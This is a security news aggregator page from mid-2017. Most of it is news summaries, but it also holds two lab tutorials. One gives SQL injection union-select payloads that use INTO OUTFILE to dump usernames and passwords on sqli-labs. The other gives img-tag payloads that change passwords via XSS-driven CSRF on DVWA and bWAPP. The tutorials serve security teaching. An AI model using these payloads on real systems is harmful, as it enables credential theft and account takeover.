Feed aggregator

Russia threatening to ban Telegram encrypted messaging app

News from 'Help Net Security' - 31 min 43 sec ago
Roskomnadzor, Russia’s communications regulator, is threatening to ban the use of popular encrypted messaging app Telegram. The request Roskomnadzor is a federal agency tasked with overseeing that the media, telecoms and other mass communications providers comply with existing laws and adequately protect the confidentiality of personal data being processed. It’s head, Alexander Zharov, claims that Telegram (the company) has not responded to repeated requests to fill in a form with information on the company that … More →
Categories: Cyber India

Anthem ready to pay $115 million to settle data breach lawsuit

News from 'Help Net Security' - 2 hours 44 min ago
US health insurer Anthem has agreed to pay $115 million to settle a class-action suit mounted in the wake of the massive data breach it suffered in late 2014/early 2015. The data breach The breach was the largest healthcare breach to that date, and resulted in the compromise of information about 78.8 million Anthem customers and customers of other insurers affiliated with Anthem: names, birthdays, medical IDs/social security numbers, street addresses, email addresses and employment … More →
Categories: Cyber India

Dumping Database using Outfile

News from 'Hacking Articles' - 6 hours 27 min ago

In our previous  article you have learned the basic concepts of SQL injection but in some scenarios you will find that your basic knowledge and tricks will fail. Today we are going to perform SELECT…INTO OUTFILE statement is easiest way of exporting a table records into a text file or excel file

 This statement allows user to load table information very rapidly to a text file on the server machine. SELECT … INTO OUTFILE writes the significant rows to a file, and gives authority to the use of column and row terminators to specify output format. The output file is created directly by the MySQL server, so the filename with path should be specify where user want the file to be written on the server host. The file must not exist already on server. It cannot be overwritten. A user requires the FILE privilege to run this statement.

Let’s start!!

Lesson 7

Open the browser and type following SQL query in URL

http://localhost:81/sqli/Less-7/?id=1

From screenshot you can read “you are in….. Use outfile” now let’s try to break this statement.

OKAY! The Query has been broken successfully we receive the error message when we had used single quote (‘) in order to break query hence it confirms that it is vulnerable.

http://localhost:81/sqli/Less-7/?id=1

After making lots of efforts finally successfully the query gets fixed, if noticed the step for SQL injection is similar as previous chapter only techniques to fix the query is different.

http://localhost:81/sqli/Less-7/?id=1))    –+

Now following query will dump the result into a text file. Here you need to mention the path where user wants the file to be written on the server host. The file must not exist already on server user always use new text file for over writing database information.

http://localhost:81/sqli/Less-7/?id=1′)) union select 1,2,3 into outfile “/xampp/htdocs/sqli/Less-7/hack1.txt” –+

 From screenshot you can perceive that still it is showing error message now open another tab for the output of resultant query.

http://localhost:81/sqli/Less-7/

Now add file name hack1.txt to check output of above query.

http://localhost:81/sqli/Less-7/hack1.txt

hence you can see we get output of executed query inside text file. This will save hack1.txt file inside the server machine also.

Execute following query to retrieve database name using union injection using a new text file.

http://localhost:81/sqli/Less-7/?id=1′)) union select 1,2,database() into outfile “/xampp/htdocs/sqli/Less-7/hack2.txt” –+

http://localhost:81/sqli/Less-7/hack2.txt

Hence you can see we have successfully get security as database name as result.

Next query will provide entire table names saved inside the database using another text file.

http://localhost:81/sqli/Less-7/?id=1′)) union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database() into outfile “/xampp/htdocs/sqli/Less-7/hack3.txt” –+

http://localhost:81/sqli/Less-7/hack3.txt

From screenshot you can read the following table names:

T1: emails

T2: referers

T3: uagents

T4: users

Now we’ll try to find out column names of users table using following query.

localhost:81/sqli/Less-7/?id=1′)) union select 1,group_concat(column_name),3 from information_schema.columns where table_name=’users’ into outfile “/xampp/htdocs/sqli/Less-7/hack4.txt” –+

http://localhost:81/sqli/Less-7/hack4.txt

Hence you can see it contains so many columns inside it I had chosen only two columns for further enumeration.

C1: username

C2: password

At last execute following query to read all username and password inside the table users from inside its column.

http://localhost:81/sqli/Less-7/?id=1′)) union select 1,group_concat(username),group_concat(password)from users into outfile “/xampp/htdocs/sqli/Less-7/hack5.txt” –+

http://localhost:81/sqli/Less-7/hack5.txt

From screenshot you can read the username and password save inside text file.

Note: you can try same attack using excel file; attacker only need to change hack1.txt into hack1.csv which will save the output into excel file.

Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here

The post Dumping Database using Outfile appeared first on Hacking Articles.

Categories: Cyber India

German law enforcement gets new hacking powers

News from 'Help Net Security' - 6 hours 59 min ago
On Thursday, the Bundestag has voted to accept a new amendment that will expand the German police’s hacking powers. The new amendment will allow them to use so-called “federal Trojans” to hack into targets’ computer, smartphone or tablet, and access all types of digital communication before it is encrypted, as well as other private data (photos, videos, etc). Before this, the federal Trojan was apparently used only for telecommunication surveillance – phone calls and text … More →
Categories: Cyber India

With ransomware, pay up if you want to keep paying

News from 'Help Net Security' - 9 hours 3 min ago
A hospital CEO is contacted in the middle of the night with a dire warning. Hackers have taken control of computer systems used for patient care, CT scans, and lab work. The hacker wants money. Rather than pay the ransom, the hospital CEO enlists several experts to try to break back into the system. It fails. Time is wasted, and the CEO has a choice. He could pay the ransom, about $17,000. Or he could … More →
Categories: Cyber India

Most businesses will not put off cloud adoption because of security concerns

News from 'Help Net Security' - 9 hours 32 min ago
Businesses are pressing ahead with their digital transformation plans, despite fears of being hit by a cyber attack or data protection regulations. This is according to a new independent research report from Advanced, which questioned over 500 senior executives in UK organisations about their attitudes to using the cloud as part of their digital transformation plans. Cloud adoption going strong Most organisations surveyed are concerned about security (82%) and data protection (68%) in the cloud … More →
Categories: Cyber India

Crowdsourced security testing and bug bounties

News from 'Help Net Security' - 10 hours 3 min ago
In the past few years, the bug bounty economy has been growing steadily, with more organizations getting on board every day. In this podcast, Ilia Kolochenko, CEO at High-Tech Bridge, talks about crowdsourced security testing and bug bounties. Here’s a transcript of the podcast for your convenience. Hello, my name is Ilia Kolochenko, I’m CEO and founder of High-Tech Bridge. I would probably say that bug bounties is a very interesting concept that first of … More →
Categories: Cyber India

Week in review: Evaluating AI-based cyber security systems, how CIA hit air-gapped computers

News from 'Help Net Security' - Mon, 26/Jun/2017 - 07:30
Here’s an overview of some of last week’s most interesting news and articles: How the CIA gained access to air-gapped computers A new WikiLeaks release of documents believed to have been stolen from the CIA show the intelligence agency’s capability to infect air-gapped computers and networks via booby-trapped USB sticks. Hackers extorted a cool $1 million from South Korean web hosting provider Whether through ransomware, or simply by breaking into computer systems and exfiltrating and … More →
Categories: Cyber India

CSRF Exploitation using XSS

News from 'Hacking Articles' - Sat, 24/Jun/2017 - 16:44

Hello friends! In our previous article we saw how an attacker can shoot web application against CSRF vulnerability with help of burp suite. Today again we are going to test CSRF attack with help of XSS vulnerability.AS we know taking the help of XSS attacker might be able to reads cookies from the same domain and if CSRF token are stored in cookies then attacker will able to read the CSRF token from CSRF protected post.

Let’s have a look how an attacker can make CSRF attack for changing password of admin account when the web application is suffering from cross site scripting vulnerability. For this tutorial I had used DVWA and set its security level low.

Suppose that you have found XSS vulnerability in any web application server. Here we are going to use java script or HTML script which will make CSRF attack for changing the password of admin account.

An XSS attack can be used to read the cookies and get the valid tokens if it is stored in cookies which have to be inserted in the malicious script to make CSRF possible. Using image tag we will send a malicious script, inside script I had set new password as 123456.

<img src=”/dvwa/vulnerabilities/csrf/?password_new=123456&password_conf=123456&Change=Change”>

Now let’s check whether the password for admin has been changed or not, previously credential was admin: password, if admin get failed to login inside web server using his previous credential then we had successfully made CSRF attack.

From given screenshot you can see using admin: password it confirms login failed. Now use your new password 123456 for login inside web server.

Similarly there is another web application bwapp where we will demonstrate same attack using XSS vulnerability. First you need to chose your bug “cross site scripting Reflected (post)” and set security level low.

In given screenshot the form is suffering from XSS vulnerability now we are going to generate a script for making CSRF possible in order to change password for a user. Here we are login as bee: bug into web server now we will try to change its password with help of cross site scripting.

Similarly using image tag we will send a malicious script, inside script I had set new password as hack.

<img src=”/bwapp/csrf_1.php?password_new=hack&password_conf=hack&action=change”>

From screenshot you can see generated image icon which means this form has XSS flaws now let check whether the password has been modified or not for user bee.

Now use previous credential bee: bug if login failed is confirmed it means we have successfully shoot the CSRF attack and from screenshot you can see “invalid credential or user not activated” message.  Now use new password for login into web server.

Conclusion: XSS vulnerabilities exist anywhere in same domain it could lead to CSRF attack and allows attackers to remotely control the target’s browser with full rights, making CSRF useless.

Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here

The post CSRF Exploitation using XSS appeared first on Hacking Articles.

Categories: Cyber India

Microsoft's Private Windows 10 Internal Builds and Partial Source Code Leaked Online

News from 'The Hackers News' - Sat, 24/Jun/2017 - 16:39
A massive archive of Microsoft's top-secret Windows 10 builds, and the source codes for private software has been reportedly leaked online, which could lead to a nasty wave of Windows 10 exploits, journalist at the Reg claims. The Leaked files – uploaded on BetaArchive website – contains more than 32 terabytes of data, which includes many non-public Windows 10 and Windows Server 2016 builds
Categories: Cyber India

How the CIA gained access to air-gapped computers

News from 'Help Net Security' - Sat, 24/Jun/2017 - 00:25
A new WikiLeaks release of documents believed to have been stolen from the CIA show the intelligence agency’s capability to infect air-gapped computers and networks via booby-trapped USB sticks. The Brutal Kangaroo project The agency would start by infecting an Internet-connected computer inside the target organizations with malware, which would infect inserted USB sticks with another piece of malware. If such a USB is ultimately inserted in the air-gapped computer, it will get infected with … More →
Categories: Cyber India

Password Reset MITM: Exposing the need for better security choices

News from 'Help Net Security' - Fri, 23/Jun/2017 - 23:43
Attackers that have set up a malicious site can use users’ account registration process to successfully perform a password reset process on a number of popular websites and messaging mobile applications, researchers have demonstrated. The Password Reset MITM attack The Password Reset Man in the Middle (PRMITM) attack exploits the similarity of the registration and password reset processes. To launch such an attack, the attacker only needs to control a website. To entice victims to … More →
Categories: Cyber India

Rivals Rev Up as Uber Hits the Skids

News from 'TechNewsWorld' - Fri, 23/Jun/2017 - 23:41
As Uber reels from the fallout of a sexual harassment scandal that led to the ouster of Travis Kalanick and several of his top executives, the company faces twin dilemmas: how to clean up its corporate work environment and restock its executive ranks; and how to maintain credibility with its customer base and core team of street level drivers. Uber controls more than 80 percent of the domestic ride-sharing market, by many estimates, and it competes strongly in major cities around the world. However, rival firms are now nipping at its heels.
Categories: Cyber India

Internet crime: The continuing rise of the BEC scam

News from 'Help Net Security' - Fri, 23/Jun/2017 - 20:37
Through its website, the FBI’s Internet Crime Complaint Center (IC3) accepts complaints about Internet-facilitated criminal activity, and forwards them to the appropriate law enforcement agencies (both in and outside the US) to investigate. The only condition that has to be satisfied in order for a report to be considered and acted upon is that either the victim or the alleged subject of the crime is located within the United States. The IC3 is, therefore, in … More →
Categories: Cyber India

New infosec products of the week​: June 23, 2017

News from 'Help Net Security' - Fri, 23/Jun/2017 - 19:33
API Behavioral Security: Detecting and blocking attacks targeting API infrastructures Elastic Beam unveiled its flagship solution, API Behavioral Security (ABS), the first AI-powered software platform able to detect and block cyberattacks that target APIs to compromise corporate data and systems – in public clouds, hybrid clouds, or on premise. ABS requires no predefined policies, security rules, or attack signatures, and can stop attacks that are new and constantly changing. Its API activity reporting simplifies forensic … More →
Categories: Cyber India

Organizations still unclear on cloud security responsibility

News from 'Help Net Security' - Fri, 23/Jun/2017 - 18:30
Vanson Bourne surveyed 1,300 IT decision makers from organizations using public cloud Infrastructure as a Service (IaaS) from the Americas, Europe, Middle East and Africa (EMEA), and from Asia Pacific (APAC). Background public cloud use Respondents’ use of public cloud is on the rise, as is their sophistication in working within the cloud. On average, organizations have nearly 40 percent of their infrastructure in the public cloud today, with the expectation to increase this to … More →
Categories: Cyber India

Two British Men Arrested For Hacking Microsoft

News from 'The Hackers News' - Fri, 23/Jun/2017 - 15:52
British police have arrested two men in the UK conspiring to hack into the computer networks of US tech giant Microsoft with plans to steal customers’ data from the software giant. The suspects — 22-year-old from Sleaford and a 25-year-old from Bracknell — were arrested by the detectives from the Britain's South East Regional Organised Crime Unit (SEROCU) Thursday morning (22 June 2017). The
Categories: Cyber India

New GhostHook Attack Bypasses Windows 10 PatchGuard Protections

News from 'The Hackers News' - Fri, 23/Jun/2017 - 11:19
Vulnerabilities discovered in Microsoft PatchGuard kernel protection could allow hackers to plant rootkits on computers running the company's latest and secure operating system, Windows 10. Researchers at CyberArk Labs have developed a new attack technique which could allow hackers to completely bypass PatchGuard, and hook a malicious kernel code (rootkits) at the kernel level. PatchGuard,
Categories: Cyber India

DHS to Congress: The Russians Are Coming Back

News from 'TechNewsWorld' - Fri, 23/Jun/2017 - 03:18
The House Intelligence Committee on Wednesday conducted a hearing focusing on the impact of Russian hacking on the 2016 elections. Members of the committee heard testimony from former DHS Secretary Jeh Johnson, who was in charge of the department when the actual hacking took place during the final months of the Obama administration. During that hearing, Johnson reiterated that Russian President Vladimir Putin had ordered the hacking with the intent of influencing the outcome of the U.S. elections.
Categories: Cyber India

Microsoft extends the Microsoft Edge Bounty Program

News from 'Help Net Security' - Fri, 23/Jun/2017 - 00:31
Initially time-bound, the Microsoft Edge Bounty Program has now been turned into one that will run indefinitely, Microsoft has announced. The past and present of the Microsoft Edge Bounty Program “Since 2013, we have launched three browser bounties to uncover specific vulnerabilities. As security is a continuous effort and not a destination, we prioritize identifying different types of vulnerabilities in different points of time,” says Akila Srinivasan, a program manager with the Microsoft Security Response … More →
Categories: Cyber India
Syndicate content